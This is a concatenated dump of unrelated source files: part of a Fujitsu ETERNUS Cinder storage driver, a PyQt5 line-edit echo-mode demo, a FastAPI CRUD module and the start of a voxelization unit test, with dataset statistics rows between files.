        raise exception.VolumeBackendAPIException(data=msg)
    LOG.debug('_find_copysession, '
              'cpsessionlist: %(cpsessionlist)s.',
              {'cpsessionlist': cpsessionlist})
    LOG.debug('_find_copysession, ret: %s.', cpsessionlist)
    return cpsessionlist
def _wait_for_copy_complete(self, cpsession):
    """Wait for the completion of copy.

    Polls the copy-session instance every 10 seconds; the session
    instance disappearing (GetInstance failing or returning nothing)
    is the completion signal.  Raises when the session goes BROKEN.
    """
    LOG.debug('_wait_for_copy_complete, cpsession: %s.', cpsession)
    cpsession_instance = None
    while True:
        try:
            cpsession_instance = self.conn.GetInstance(
                cpsession,
                LocalOnly=False)
        except Exception:
            cpsession_instance = None
        # if copy session is none,
        # it means copy session was finished,break and return
        if cpsession_instance is None:
            break
        LOG.debug('_wait_for_copy_complete, '
                  'find target copysession, '
                  'wait for end of copysession.')
        if cpsession_instance['CopyState'] == BROKEN:
            msg = (_('_wait_for_copy_complete, '
                     'cpsession: %(cpsession)s, '
                     'copysession state is BROKEN.')
                   % {'cpsession': cpsession})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
        # NOTE(review): there is no upper bound on this loop -- a copy
        # session stuck in a non-BROKEN state blocks forever; confirm
        # that an external timeout covers this.
        time.sleep(10)
@utils.retry(exception.VolumeBackendAPIException)
def _delete_copysession(self, cpsession):
    """delete copysession.

    Ends the copy session with the operation code matching its
    CopyType (Return To ResourcePool for SnapOPC, Detach for
    OPC/EC/REC) via ModifyReplicaSynchronization.  A session that has
    already completed or disappeared is treated as success.
    """
    LOG.debug('_delete_copysession: cpssession: %s.', cpsession)
    try:
        cpsession_instance = self._get_eternus_instance(
            cpsession, LocalOnly=False)
    except Exception:
        # The session instance is gone: the copy already finished.
        LOG.info('_delete_copysession, '
                 'the copysession was already completed.')
        return
    copytype = cpsession_instance['CopyType']
    # set oparation code
    # SnapOPC: 19 (Return To ResourcePool)
    # OPC:8 (Detach)
    # EC/REC:8 (Detach)
    operation = OPERATION_dic.get(copytype, None)
    if operation is None:
        msg = (_('_delete_copysession, '
                 'copy session type is undefined! '
                 'copy session: %(cpsession)s, '
                 'copy type: %(copytype)s.')
               % {'cpsession': cpsession,
                  'copytype': copytype})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)
    repservice = self._find_eternus_service(REPL)
    if repservice is None:
        msg = (_('_delete_copysession, '
                 'Cannot find Replication Service'))
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)
    # Invoke method for delete copysession
    rc, errordesc, job = self._exec_eternus_service(
        'ModifyReplicaSynchronization',
        repservice,
        Operation=self._pywbem_uint(operation, '16'),
        Synchronization=cpsession,
        Force=True,
        WaitForCopyState=self._pywbem_uint(15, '16'))
    LOG.debug('_delete_copysession, '
              'copysession: %(cpsession)s, '
              'operation: %(operation)s, '
              'Return code: %(rc)lu, '
              'Error: %(errordesc)s.',
              {'cpsession': cpsession,
               'operation': operation,
               'rc': rc,
               'errordesc': errordesc})
    if rc == COPYSESSION_NOT_EXIST:
        # Benign race: the session was removed by someone else.
        LOG.debug('_delete_copysession, '
                  'cpsession: %(cpsession)s, '
                  'copysession is not exist.',
                  {'cpsession': cpsession})
    elif rc == VOLUME_IS_BUSY:
        # VolumeIsBusy tells the manager to retry the delete later.
        msg = (_('_delete_copysession, '
                 'copysession: %(cpsession)s, '
                 'operation: %(operation)s, '
                 'Error: Volume is in Busy state')
               % {'cpsession': cpsession,
                  'operation': operation})
        raise exception.VolumeIsBusy(msg)
    elif rc != 0:
        msg = (_('_delete_copysession, '
                 'copysession: %(cpsession)s, '
                 'operation: %(operation)s, '
                 'Return code: %(rc)lu, '
                 'Error: %(errordesc)s.')
               % {'cpsession': cpsession,
                  'operation': operation,
                  'rc': rc,
                  'errordesc': errordesc})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)
def _get_target_port(self):
    """Return the usable target port instances for the configured protocol.

    Enumerates the protocol endpoints matching self.protocol ('fc' or
    'iSCSI'), skipping ports reserved for remote copy (RAMode bits) or
    Storage Cluster (SCGroupNo present).

    Raises VolumeBackendAPIException when the protocol is unknown or
    no usable port is found.  (Previously an unrecognized protocol fell
    through both branches and crashed with UnboundLocalError.)
    """
    LOG.debug('_get_target_port, protocol: %s.', self.protocol)
    target_portlist = []
    if self.protocol == 'fc':
        prtcl_endpoint = 'FUJITSU_SCSIProtocolEndpoint'
        connection_type = 2
    elif self.protocol == 'iSCSI':
        prtcl_endpoint = 'FUJITSU_iSCSIProtocolEndpoint'
        connection_type = 7
    else:
        # Fail loudly instead of UnboundLocalError further down.
        msg = (_('_get_target_port, '
                 'unsupported protocol: %(protocol)s.')
               % {'protocol': self.protocol})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)
    try:
        tgtportlist = self._enum_eternus_instances(prtcl_endpoint)
    except Exception:
        msg = (_('_get_target_port, '
                 'EnumerateInstances, '
                 'cannot connect to ETERNUS.'))
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)
    for tgtport in tgtportlist:
        # Check : protocol of tgtport
        if tgtport['ConnectionType'] != connection_type:
            continue
        # Check : if port is for remote copy, continue
        if (tgtport['RAMode'] & 0x7B) != 0x00:
            continue
        # Check : if port is for StorageCluster, continue
        if 'SCGroupNo' in tgtport:
            continue
        target_portlist.append(tgtport)
        LOG.debug('_get_target_port, '
                  'connection type: %(cont)s, '
                  'ramode: %(ramode)s.',
                  {'cont': tgtport['ConnectionType'],
                   'ramode': tgtport['RAMode']})
    LOG.debug('_get_target_port, '
              'target port: %(target_portid)s.',
              {'target_portid': target_portlist})
    if len(target_portlist) == 0:
        msg = (_('_get_target_port, '
                 'protcol: %(protocol)s, '
                 'target_port not found.')
               % {'protocol': self.protocol})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)
    LOG.debug('_get_target_port, ret: %s.', target_portlist)
    return target_portlist
@lockutils.synchronized('ETERNUS-connect', 'cinder-', True)
def _map_lun(self, vol_instance, connector, targetlist=None):
    """map volume to host.

    When the connector's initiators already belong to affinity groups,
    the LUN is added to each of them; otherwise a new affinity group
    with host affinity is created per target port via ExposePaths.
    Per-path failures are logged as warnings rather than raised.
    """
    volumename = vol_instance['ElementName']
    LOG.debug('_map_lun, '
              'volume name: %(vname)s, connector: %(connector)s.',
              {'vname': volumename, 'connector': connector})
    volume_uid = vol_instance['Name']
    initiatorlist = self._find_initiator_names(connector)
    aglist = self._find_affinity_group(connector)
    configservice = self._find_eternus_service(CTRL_CONF)
    if targetlist is None:
        targetlist = self._get_target_port()
    if configservice is None:
        msg = (_('_map_lun, '
                 'vol_instance.path:%(vol)s, '
                 'volumename: %(volumename)s, '
                 'volume_uid: %(uid)s, '
                 'initiator: %(initiator)s, '
                 'target: %(tgt)s, '
                 'aglist: %(aglist)s, '
                 'Storage Configuration Service not found.')
               % {'vol': vol_instance.path,
                  'volumename': volumename,
                  'uid': volume_uid,
                  'initiator': initiatorlist,
                  'tgt': targetlist,
                  'aglist': aglist})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)
    LOG.debug('_map_lun, '
              'vol_instance.path: %(vol_instance)s, '
              'volumename:%(volumename)s, '
              'initiator:%(initiator)s, '
              'target:%(tgt)s.',
              {'vol_instance': vol_instance.path,
               'volumename': [volumename],
               'initiator': initiatorlist,
               'tgt': targetlist})
    if not aglist:
        # Create affinity group and set host-affinity.
        for target in targetlist:
            LOG.debug('_map_lun, '
                      'lun_name: %(volume_uid)s, '
                      'Initiator: %(initiator)s, '
                      'target: %(target)s.',
                      {'volume_uid': [volume_uid],
                       'initiator': initiatorlist,
                       'target': target['Name']})
            rc, errordesc, job = self._exec_eternus_service(
                'ExposePaths',
                configservice,
                LUNames=[volume_uid],
                InitiatorPortIDs=initiatorlist,
                TargetPortIDs=[target['Name']],
                DeviceAccesses=[self._pywbem_uint(2, '16')])
            LOG.debug('_map_lun, '
                      'Error: %(errordesc)s, '
                      'Return code: %(rc)lu, '
                      'Create affinitygroup and set host-affinity.',
                      {'errordesc': errordesc,
                       'rc': rc})
            # LUNAME_IN_USE means the volume is already exposed on
            # this path, which is fine for an idempotent map.
            if rc != 0 and rc != LUNAME_IN_USE:
                LOG.warning('_map_lun, '
                            'lun_name: %(volume_uid)s, '
                            'Initiator: %(initiator)s, '
                            'target: %(target)s, '
                            'Return code: %(rc)lu, '
                            'Error: %(errordesc)s.',
                            {'volume_uid': [volume_uid],
                             'initiator': initiatorlist,
                             'target': target['Name'],
                             'rc': rc,
                             'errordesc': errordesc})
    else:
        # Add lun to affinity group
        for ag in aglist:
            LOG.debug('_map_lun, '
                      'ag: %(ag)s, lun_name: %(volume_uid)s.',
                      {'ag': ag,
                       'volume_uid': volume_uid})
            rc, errordesc, job = self._exec_eternus_service(
                'ExposePaths',
                configservice, LUNames=[volume_uid],
                DeviceAccesses=[self._pywbem_uint(2, '16')],
                ProtocolControllers=[ag])
            LOG.debug('_map_lun, '
                      'Error: %(errordesc)s, '
                      'Return code: %(rc)lu, '
                      'Add lun to affinity group.',
                      {'errordesc': errordesc,
                       'rc': rc})
            if rc != 0 and rc != LUNAME_IN_USE:
                LOG.warning('_map_lun, '
                            'lun_name: %(volume_uid)s, '
                            'Initiator: %(initiator)s, '
                            'ag: %(ag)s, '
                            'Return code: %(rc)lu, '
                            'Error: %(errordesc)s.',
                            {'volume_uid': [volume_uid],
                             'initiator': initiatorlist,
                             'ag': ag,
                             'rc': rc,
                             'errordesc': errordesc})
def _find_initiator_names(self, connector):
    """Return the connector's initiator identifiers (WWPNs or IQN)."""
    names = []

    if self.protocol == 'fc' and connector['wwpns']:
        LOG.debug('_find_initiator_names, wwpns: %s.',
                  connector['wwpns'])
        names = connector['wwpns']
    elif self.protocol == 'iSCSI' and connector['initiator']:
        LOG.debug('_find_initiator_names, initiator: %s.',
                  connector['initiator'])
        names.append(connector['initiator'])

    if not names:
        msg = (_('_find_initiator_names, '
                 'connector: %(connector)s, '
                 'initiator not found.')
               % {'connector': connector})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)

    LOG.debug('_find_initiator_names, '
              'initiator list: %(initiator)s.',
              {'initiator': names})
    return names
def _find_affinity_group(self, connector, vol_instance=None):
    """find affinity group from connector.

    When *vol_instance* is None, every affinity group on the array is
    considered; otherwise only the groups that already contain the
    volume.  A group is returned when one of its authorized privileges
    matches one of the connector's initiators (substring match on the
    privilege InstanceID).
    """
    LOG.debug('_find_affinity_group, vol_instance: %s.', vol_instance)
    affinity_grouplist = []
    initiatorlist = self._find_initiator_names(connector)
    if vol_instance is None:
        # Enumerate every affinity group on the array.
        try:
            aglist = self._enum_eternus_instance_names(
                'FUJITSU_AffinityGroupController')
        except Exception:
            msg = (_('_find_affinity_group, '
                     'connector: %(connector)s, '
                     'EnumerateInstanceNames, '
                     'cannot connect to ETERNUS.')
                   % {'connector': connector})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
        LOG.debug('_find_affinity_group,'
                  'affinity_groups:%s', aglist)
    else:
        # Restrict to affinity groups that reference this volume.
        try:
            aglist = self._assoc_eternus_names(
                vol_instance.path,
                AssocClass='FUJITSU_ProtocolControllerForUnit',
                ResultClass='FUJITSU_AffinityGroupController')
        except Exception:
            msg = (_('_find_affinity_group,'
                     'connector: %(connector)s,'
                     'AssocNames: FUJITSU_ProtocolControllerForUnit, '
                     'cannot connect to ETERNUS.')
                   % {'connector': connector})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
        LOG.debug('_find_affinity_group, '
                  'vol_instance.path: %(volume)s, '
                  'affinity_groups: %(aglist)s.',
                  {'volume': vol_instance.path,
                   'aglist': aglist})
    for ag in aglist:
        try:
            hostaglist = self._assoc_eternus(
                ag,
                AssocClass='FUJITSU_AuthorizedTarget',
                ResultClass='FUJITSU_AuthorizedPrivilege')
        except Exception:
            msg = (_('_find_affinity_group, '
                     'connector: %(connector)s, '
                     'Associators: FUJITSU_AuthorizedTarget, '
                     'cannot connect to ETERNUS.')
                   % {'connector': connector})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
        for hostag in hostaglist:
            for initiator in initiatorlist:
                if initiator.lower() not in hostag['InstanceID'].lower():
                    continue
                LOG.debug('_find_affinity_group, '
                          'AffinityGroup: %(ag)s.', {'ag': ag})
                affinity_grouplist.append(ag)
                break
            # NOTE(review): this unconditional break means only the
            # first AuthorizedPrivilege entry of each group is ever
            # inspected -- confirm that hostaglist[0] is sufficient.
            break
    LOG.debug('_find_affinity_group, '
              'initiators: %(initiator)s, '
              'affinity_group: %(affinity_group)s.',
              {'initiator': initiatorlist,
               'affinity_group': affinity_grouplist})
    return affinity_grouplist
@lockutils.synchronized('ETERNUS-connect', 'cinder-', True)
def _unmap_lun(self, volume, connector, force=False):
    """unmap volume from host.

    Removes the LUN's host affinity.  When *force* is True the volume
    is removed from every affinity group referencing it, regardless of
    the connector's initiators.  Returns False when the volume does
    not exist or is not mapped, True otherwise.

    Bug fixes versus the previous revision:
    * the entry debug message was mislabelled '_map_lun';
    * the "Controller Configuration Service not found" message used
      the format key %(volume)s while the mapping supplied 'vol',
      which raised KeyError instead of the intended error message.
    """
    LOG.debug('_unmap_lun, volume id: %(vid)s, '
              'connector: %(connector)s, force: %(frc)s.',
              {'vid': volume['id'],
               'connector': connector, 'frc': force})
    volumename = self._create_volume_name(volume['id'])
    vol_instance = self._find_lun(volume)
    if vol_instance is None:
        # Nothing on the array to unmap.
        LOG.info('_unmap_lun, '
                 'volumename:%(volumename)s, '
                 'volume not found.',
                 {'volumename': volumename})
        return False
    volume_uid = vol_instance['Name']
    if not force:
        # Only affinity groups matching this connector's initiators.
        aglist = self._find_affinity_group(connector, vol_instance)
        if not aglist:
            LOG.info('_unmap_lun, '
                     'volumename: %(volumename)s, '
                     'volume is not mapped.',
                     {'volumename': volumename})
            return False
    else:
        # Forced unmap: every affinity group containing the volume.
        try:
            aglist = self._assoc_eternus_names(
                vol_instance.path,
                AssocClass='CIM_ProtocolControllerForUnit',
                ResultClass='FUJITSU_AffinityGroupController')
        except Exception:
            msg = (_('_unmap_lun,'
                     'vol_instance.path: %(volume)s, '
                     'AssociatorNames: CIM_ProtocolControllerForUnit, '
                     'cannot connect to ETERNUS.')
                   % {'volume': vol_instance.path})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
        LOG.debug('_unmap_lun, '
                  'vol_instance.path: %(volume)s, '
                  'affinity_groups: %(aglist)s.',
                  {'volume': vol_instance.path,
                   'aglist': aglist})
    configservice = self._find_eternus_service(CTRL_CONF)
    if configservice is None:
        msg = (_('_unmap_lun, '
                 'vol_instance.path: %(volume)s, '
                 'volumename: %(volumename)s, '
                 'volume_uid: %(uid)s, '
                 'aglist: %(aglist)s, '
                 'Controller Configuration Service not found.')
               % {'volume': vol_instance.path,
                  'volumename': [volumename],
                  'uid': [volume_uid],
                  'aglist': aglist})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)
    for ag in aglist:
        LOG.debug('_unmap_lun, '
                  'volumename: %(volumename)s, '
                  'volume_uid: %(volume_uid)s, '
                  'AffinityGroup: %(ag)s.',
                  {'volumename': volumename,
                   'volume_uid': volume_uid,
                   'ag': ag})
        # HidePaths removes the LUN from the affinity group.
        rc, errordesc, job = self._exec_eternus_service(
            'HidePaths',
            configservice,
            LUNames=[volume_uid],
            ProtocolControllers=[ag])
        LOG.debug('_unmap_lun, '
                  'Error: %(errordesc)s, '
                  'Return code: %(rc)lu.',
                  {'errordesc': errordesc,
                   'rc': rc})
        if rc == LUNAME_NOT_EXIST:
            # Already unmapped from this group; treat as success.
            LOG.debug('_unmap_lun, '
                      'volumename: %(volumename)s, '
                      'Invalid LUNames.',
                      {'volumename': volumename})
        elif rc != 0:
            msg = (_('_unmap_lun, '
                     'volumename: %(volumename)s, '
                     'volume_uid: %(volume_uid)s, '
                     'AffinityGroup: %(ag)s, '
                     'Return code: %(rc)lu, '
                     'Error: %(errordesc)s.')
                   % {'volumename': volumename,
                      'volume_uid': volume_uid,
                      'ag': ag,
                      'rc': rc,
                      'errordesc': errordesc})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
    LOG.debug('_unmap_lun, '
              'volumename: %(volumename)s.',
              {'volumename': volumename})
    return True
def _get_eternus_iscsi_properties(self):
    """get target port iqns and target_portals.

    Walks FUJITSU_IPProtocolEndpoint -> FUJITSU_TCPProtocolEndpoint ->
    FUJITSU_iSCSIProtocolEndpoint for every array IP listed under
    EternusISCSIIP in the driver config, returning a list of
    (iscsi endpoint path, 'ip:port' portal, iqn) tuples.
    """
    iscsi_properties_list = []
    iscsiip_list = self._get_drvcfg('EternusISCSIIP', multiple=True)
    iscsi_port = self.configuration.target_port
    LOG.debug('_get_eternus_iscsi_properties, iplist: %s.', iscsiip_list)
    try:
        ip_endpointlist = self._enum_eternus_instance_names(
            'FUJITSU_IPProtocolEndpoint')
    except Exception:
        msg = (_('_get_eternus_iscsi_properties, '
                 'iscsiip: %(iscsiip)s, '
                 'EnumerateInstanceNames, '
                 'cannot connect to ETERNUS.')
               % {'iscsiip': iscsiip_list})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)
    for ip_endpoint in ip_endpointlist:
        try:
            ip_endpoint_instance = self._get_eternus_instance(
                ip_endpoint)
            ip_address = ip_endpoint_instance['IPv4Address']
            LOG.debug('_get_eternus_iscsi_properties, '
                      'instanceip: %(ip)s, '
                      'iscsiip: %(iscsiip)s.',
                      {'ip': ip_address,
                       'iscsiip': iscsiip_list})
        except Exception:
            msg = (_('_get_eternus_iscsi_properties, '
                     'iscsiip: %(iscsiip)s, '
                     'GetInstance, '
                     'cannot connect to ETERNUS.')
                   % {'iscsiip': iscsiip_list})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
        # Only endpoints whose IP is configured for this backend.
        if ip_address not in iscsiip_list:
            continue
        LOG.debug('_get_eternus_iscsi_properties, '
                  'find iscsiip: %(ip)s.', {'ip': ip_address})
        try:
            tcp_endpointlist = self._assoc_eternus_names(
                ip_endpoint,
                AssocClass='CIM_BindsTo',
                ResultClass='FUJITSU_TCPProtocolEndpoint')
        except Exception:
            msg = (_('_get_eternus_iscsi_properties, '
                     'iscsiip: %(iscsiip)s, '
                     'AssociatorNames: CIM_BindsTo, '
                     'cannot connect to ETERNUS.')
                   % {'iscsiip': ip_address})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
        for tcp_endpoint in tcp_endpointlist:
            try:
                iscsi_endpointlist = (
                    self._assoc_eternus(tcp_endpoint,
                                        AssocClass='CIM_BindsTo',
                                        ResultClass='FUJITSU_iSCSI'
                                        'ProtocolEndpoint'))
            except Exception:
                msg = (_('_get_eternus_iscsi_properties, '
                         'iscsiip: %(iscsiip)s, '
                         'AssociatorNames: CIM_BindsTo, '
                         'cannot connect to ETERNUS.')
                       % {'iscsiip': ip_address})
                LOG.error(msg)
                raise exception.VolumeBackendAPIException(data=msg)
            for iscsi_endpoint in iscsi_endpointlist:
                target_portal = "%s:%s" % (ip_address, iscsi_port)
                # Endpoint Name is 'iqn,...'; the IQN is the first field.
                iqn = iscsi_endpoint['Name'].split(',')[0]
                iscsi_properties_list.append((iscsi_endpoint.path,
                                              target_portal,
                                              iqn))
                LOG.debug('_get_eternus_iscsi_properties, '
                          'target_portal: %(target_portal)s, '
                          'iqn: %(iqn)s.',
                          {'target_portal': target_portal,
                           'iqn': iqn})
    if len(iscsi_properties_list) == 0:
        msg = (_('_get_eternus_iscsi_properties, '
                 'iscsiip list: %(iscsiip_list)s, '
                 'iqn not found.')
               % {'iscsiip_list': iscsiip_list})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)
    LOG.debug('_get_eternus_iscsi_properties, '
              'iscsi_properties_list: %(iscsi_properties_list)s.',
              {'iscsi_properties_list': iscsi_properties_list})
    return iscsi_properties_list
def _wait_for_job_complete(self, conn, job):
    """Given the job wait for it to complete.

    Polls the CIM ConcreteJob referenced by job['Job'] at
    JOB_INTERVAL_SEC until it finishes or JOB_RETRIES attempts have
    been made, then returns the job's ErrorCode.
    """
    # Poll bookkeeping is stored on self so the closure can mutate it.
    self.retries = 0
    self.wait_for_job_called = False

    def _wait_for_job_complete():
        """Called at an interval until the job is finished."""
        if self._is_job_finished(conn, job):
            raise loopingcall.LoopingCallDone()
        if self.retries > JOB_RETRIES:
            # Give up after too many polls; the final GetInstance below
            # still reports whatever ErrorCode the job has.
            LOG.error("_wait_for_job_complete, "
                      "failed after %(retries)d tries.",
                      {'retries': self.retries})
            raise loopingcall.LoopingCallDone()
        try:
            self.retries += 1
            if not self.wait_for_job_called:
                if self._is_job_finished(conn, job):
                    self.wait_for_job_called = True
        except Exception:
            exceptionMessage = _("Issue encountered waiting for job.")
            LOG.exception(exceptionMessage)
            raise exception.VolumeBackendAPIException(exceptionMessage)

    self.wait_for_job_called = False
    timer = loopingcall.FixedIntervalLoopingCall(_wait_for_job_complete)
    timer.start(interval=JOB_INTERVAL_SEC).wait()

    jobInstanceName = job['Job']
    jobinstance = conn.GetInstance(jobInstanceName,
                                   LocalOnly=False)
    rc = jobinstance['ErrorCode']
    LOG.debug('_wait_for_job_complete, rc: %s.', rc)
    return rc
def _is_job_finished(self, conn, job):
    """Return True when the CIM job referenced by job['Job'] has ended."""
    jobinstance = conn.GetInstance(job['Job'], LocalOnly=False)
    jobstate = jobinstance['JobState']
    LOG.debug('_is_job_finished,'
              'state: %(state)s', {'state': jobstate})
    # From ValueMap of JobState in CIM_ConcreteJob
    # 2=New, 3=Starting, 4=Running, 32767=Queue Pending
    # ValueMap("2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13..32767,
    # 32768..65535"),
    # Values("New, Starting, Running, Suspended, Shutting Down,
    # Completed, Terminated, Killed, Exception, Service,
    # Query Pending, DMTF Reserved, Vendor Reserved")]
    # NOTE(deva): string matching based on
    # http://ipmitool.cvs.sourceforge.net/
    # viewvc/ipmitool/ipmitool/lib/ipmi_chassis.c
    job_finished = jobstate not in (2, 3, 4)
    LOG.debug('_is_job_finished, finish: %s.', job_finished)
    return job_finished
def _pywbem_uint(self, num, datatype):
try:
result = {
'8': pywbem.Uint8(num),
'16': pywbem.Uint16(num),
'32': pywbem.Uint32(num),
'64': pywbem.Uint64(num)
}
result = result.get(datatype, num)
except NameError:
result = num
return result
| 39.547945
| 79
| 0.529558
|
4a02243c25af8646b0670532674ab3f8d1cac960
| 1,499
|
py
|
Python
|
pyqt/pyqt5-master/src/controls/QLineEditEchoMode.py
|
Ding-zhenke/Dcount-s-notebook
|
16c29ac7d076c466e053f1b8db4a7f4e43f67a24
|
[
"MIT"
] | null | null | null |
pyqt/pyqt5-master/src/controls/QLineEditEchoMode.py
|
Ding-zhenke/Dcount-s-notebook
|
16c29ac7d076c466e053f1b8db4a7f4e43f67a24
|
[
"MIT"
] | null | null | null |
pyqt/pyqt5-master/src/controls/QLineEditEchoMode.py
|
Ding-zhenke/Dcount-s-notebook
|
16c29ac7d076c466e053f1b8db4a7f4e43f67a24
|
[
"MIT"
] | 2
|
2019-06-18T05:53:26.000Z
|
2019-06-19T03:26:02.000Z
|
'''
QLineEdit控件与回显模式
基本功能:输入单行的文本
EchoMode(回显模式)
4种回显模式
1. Normal
2. NoEcho
3. Password
4. PasswordEchoOnEdit
Mac : Command Windows:Control
'''
from PyQt5.QtWidgets import *
import sys
class QLineEditEchoMode(QWidget):
    """Demo window showing the four QLineEdit echo modes in a form."""

    def __init__(self):
        super(QLineEditEchoMode, self).__init__()
        self.initUI()

    def initUI(self):
        """Create one QLineEdit per echo mode and lay them out as rows."""
        self.setWindowTitle('文本输入框的回显模式')

        formLayout = QFormLayout()
        # (row label == placeholder text, echo mode) for each line edit.
        modes = [
            ("Normal", QLineEdit.Normal),
            ("NoEcho", QLineEdit.NoEcho),
            ("Password", QLineEdit.Password),
            ("PasswordEchoOnEdit", QLineEdit.PasswordEchoOnEdit),
        ]
        for label, mode in modes:
            edit = QLineEdit()
            edit.setPlaceholderText(label)
            edit.setEchoMode(mode)
            formLayout.addRow(label, edit)

        self.setLayout(formLayout)
if __name__ == '__main__':
    # Run the demo standalone: create the Qt application, show the
    # window, and block in the event loop until the user closes it.
    app = QApplication(sys.argv)
    main = QLineEditEchoMode()
    main.show()
    sys.exit(app.exec_())
| 24.57377
| 76
| 0.708472
|
4a022448f6064e33833a466c26ececc0608389b6
| 2,237
|
py
|
Python
|
{{cookiecutter.project_slug}}/backend/app/db/tipo_acordo/crud.py
|
souzjfe/conectar
|
0603e955394765f3fc1a01bbd902be695bc44cba
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_slug}}/backend/app/db/tipo_acordo/crud.py
|
souzjfe/conectar
|
0603e955394765f3fc1a01bbd902be695bc44cba
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_slug}}/backend/app/db/tipo_acordo/crud.py
|
souzjfe/conectar
|
0603e955394765f3fc1a01bbd902be695bc44cba
|
[
"MIT"
] | null | null | null |
from fastapi import HTTPException, status
from sqlalchemy.orm import Session
import typing as t
from app.db import models
from . import schemas
def get_tipo_acordo(db: Session, tipo_acordo_id: int) -> schemas.TipoAcordo:
    """Return the TipoAcordo with the given id, raising HTTP 404 when absent."""
    query = db.query(models.TipoAcordo)
    tipo_acordo = query.filter(models.TipoAcordo.id == tipo_acordo_id).first()
    if tipo_acordo is None:
        raise HTTPException(
            status_code=404, detail="tipo_acordo não encontrado"
        )
    return tipo_acordo
async def create_tipo_acordo(
    db: Session, tipo_acordo: schemas.TipoAcordoCreate
) -> schemas.TipoAcordo:
    """Create a new TipoAcordo, rejecting duplicate descriptions.

    Raises:
        HTTPException 409: a TipoAcordo with the same ``descricao``
            already exists.
    """
    # Bug fix: the duplicate check previously ran
    # ``db.query(models.Area).filter(models.TipoAcordo.descricao == ...)``,
    # querying one model while filtering on another — an accidental cross
    # join that could mis-report duplicates. Query TipoAcordo itself.
    duplicate = (
        db.query(models.TipoAcordo)
        .filter(models.TipoAcordo.descricao == tipo_acordo.descricao)
        .first()
    )
    if duplicate:
        raise HTTPException(status_code=409, detail="TipoAcordo já cadastrado")
    # The original wrapped the insert in a try/except that only re-raised;
    # the wrapper added nothing, so it was removed.
    db_tipo_acordo = models.TipoAcordo(
        descricao=tipo_acordo.descricao,
    )
    db.add(db_tipo_acordo)
    db.commit()
    db.refresh(db_tipo_acordo)
    return db_tipo_acordo
def edit_tipo_acordo(
    db: Session, tipo_acordo_id: int, tipo_acordo: schemas.TipoAcordoEdit
) -> schemas.TipoAcordoEdit:
    """Partially update an existing TipoAcordo.

    Raises:
        HTTPException 404: no TipoAcordo with ``tipo_acordo_id`` exists
            (raised from get_tipo_acordo, so no extra check is needed here).
        HTTPException 409: another TipoAcordo already uses the requested
            ``descricao``.
    """
    db_tipo_acordo = get_tipo_acordo(db, tipo_acordo_id)
    # exclude_unset=True means fields the caller omitted are absent.
    update_data = tipo_acordo.dict(exclude_unset=True)
    # Bug fixes relative to the original:
    #  * it indexed update_data["descricao"] unconditionally, raising
    #    KeyError on partial updates that omit descricao;
    #  * it queried models.Area while filtering on models.TipoAcordo
    #    (an accidental cross join) — query TipoAcordo itself.
    if "descricao" in update_data:
        duplicate = (
            db.query(models.TipoAcordo)
            .filter(models.TipoAcordo.descricao == update_data["descricao"])
            .first()
        )
        if duplicate:
            raise HTTPException(
                status_code=409, detail="TipoAcordo já cadastrado"
            )
    for key, value in update_data.items():
        setattr(db_tipo_acordo, key, value)
    db.add(db_tipo_acordo)
    db.commit()
    db.refresh(db_tipo_acordo)
    return db_tipo_acordo
def delete_tipo_acordo(db: Session, tipo_acordo_id: int):
    """Delete a TipoAcordo by id and return the deleted row."""
    doomed = get_tipo_acordo(db, tipo_acordo_id)
    # get_tipo_acordo raises HTTP 404 itself, so this branch is in
    # practice unreachable; kept to mirror the original control flow.
    if not doomed:
        raise HTTPException(
            status.HTTP_404_NOT_FOUND, detail="tipo_acordo não encontrado"
        )
    db.delete(doomed)
    db.commit()
    return doomed
| 25.712644
| 79
| 0.676799
|
4a02246caa3e8db09e2997ed6087a0c8f91323f2
| 4,787
|
py
|
Python
|
python/test/test_perimeter.py
|
beyse/voxel8
|
04ff337ece1bccbe6b785ae1a8190779a6619a64
|
[
"MIT"
] | 66
|
2018-05-28T00:13:48.000Z
|
2022-03-19T03:39:26.000Z
|
python/test/test_perimeter.py
|
beyse/voxel8
|
04ff337ece1bccbe6b785ae1a8190779a6619a64
|
[
"MIT"
] | 29
|
2018-06-19T12:15:10.000Z
|
2021-11-28T06:02:35.000Z
|
python/test/test_perimeter.py
|
beyse/voxel8
|
04ff337ece1bccbe6b785ae1a8190779a6619a64
|
[
"MIT"
] | 46
|
2018-06-03T01:14:09.000Z
|
2022-02-13T14:27:05.000Z
|
import numpy as np
import unittest
from stltovoxel import perimeter
class TestPerimeter(unittest.TestCase):
    """Tests for stltovoxel.perimeter rasterization helpers."""
    def test_lines_to_pixels(self):
        """Rasterize a closed 2D polygon (at z=0) into a boolean grid and
        compare against a hand-checked expected fill."""
        test = [[(0, 0, 0), (3, 0, 0)],
                [(9, 9, 0), (3, 9, 0)],
                [(3, 0, 0), (9, 9, 0)],
                [(3, 9, 0), (0, 0, 0)]]
        actual = np.zeros((13, 13), dtype=bool)
        perimeter.lines_to_voxels(test, actual)
        expected = [
            [0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
            [0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
            [0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
